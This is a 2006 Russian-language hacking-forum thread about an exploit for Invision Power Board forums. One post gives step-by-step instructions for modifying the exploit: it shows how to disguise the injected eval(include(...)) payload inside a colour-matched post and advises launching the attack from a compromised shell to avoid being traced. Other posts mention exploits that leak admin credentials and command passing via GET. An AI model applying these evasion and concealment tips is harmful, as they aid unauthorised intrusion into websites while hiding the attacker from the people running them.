HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.04.2006, 17:28
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Цитата:
Сообщение от Desr0w  
Обоснуй plzz
Имеется ввиду ситуация как со сплойтом для пхпбб 2.0.19 на исполнение команд, когда сплойт отсылал логин, пасс админа и урл форума на родной сайт РСТ....
__________________
 

  #2  
Старый 30.04.2006, 00:06
Dark Ne0
Новичок
Регистрация: 29.04.2006
Сообщений: 7
Провел на форуме:
19402

Репутация: 0
По умолчанию

Но все равно отследить взломщика по запросу не составит труда !!!
Так что лучше с начала подумать что ломать
 

  #3  
Старый 30.04.2006, 00:25
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

я так и не понял как убрать шифровку,помогите.
Спасибо!
 

  #4  
Старый 30.04.2006, 02:42
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

сплойт интересный но пользоваться им в чистом виде не стоит.во первых он инклудит файл с сайта рст и светится у них в логах во вторых он оставляет слишком "паливный" пост.
Если уж кто пользуется им в исходном виде то хотябы сделайте это находим -
$post = "st=0&act=Post
изменяем переменные &TopicTitle=MY_COOL_TOPICK&TopicDesc=MY_COOL_DE SC
нахлдим строку
$text = 'r57ipbxp...
дописываем в начале чото типа
$text ='MY_COOL_POST [color=#EFEFEF} r57ipbxplhohohoeval(include(chr(10.........)); //[/color}';
это создаст иллюзиб поста и замаскирует код цвет подбирать под форум (скобки в конце заменить на нормальные)
запускать это дело естественно лучше с какогонить шела а не со своего компа..
 

  #5  
Старый 30.04.2006, 02:52
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Grrl,
хех,инклудится чтобы можно было команды передавать через get
 

  #6  
Старый 30.04.2006, 03:02
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

Цитата:
Сообщение от Desr0w  
Grrl,
хех,инклудится чтобы можно было команды передавать через get
правда? хм а я думала это для тогочтобы вампиров отпугивать спасибо что просвятил..
 

  #7  
Старый 30.04.2006, 03:08
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

+ на поднятие настроение поставил
 

  #8  
Старый 30.04.2006, 15:11
gimlis
Новичок
Регистрация: 25.01.2006
Сообщений: 8
Провел на форуме:
76510

Репутация: 2
По умолчанию

Без сплойта больше функциональности.
 

  #9  
Старый 30.04.2006, 17:57
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

+toxa+,ну мля х3.Я не думаю что этим парням это нужно
 

  #10  
Старый 30.04.2006, 18:08
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

2 Desr0w
Факт остаётся фактом

ССЫЛОЧКА
__________________
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 19 18.11.2006 09:19
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Эксплоит для Invision Power Board v2.1.3? xdx Уязвимости CMS / форумов 8 08.02.2006 22:56
Invision Power Board <= 1.3.1 Login.PHP SQL Injection Как пользоваться? GrisS Уязвимости CMS / форумов 16 02.02.2006 16:00
Вопрос про заливку шелла в Invision Power Board DiNo Уязвимости CMS / форумов 14 03.03.2005 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ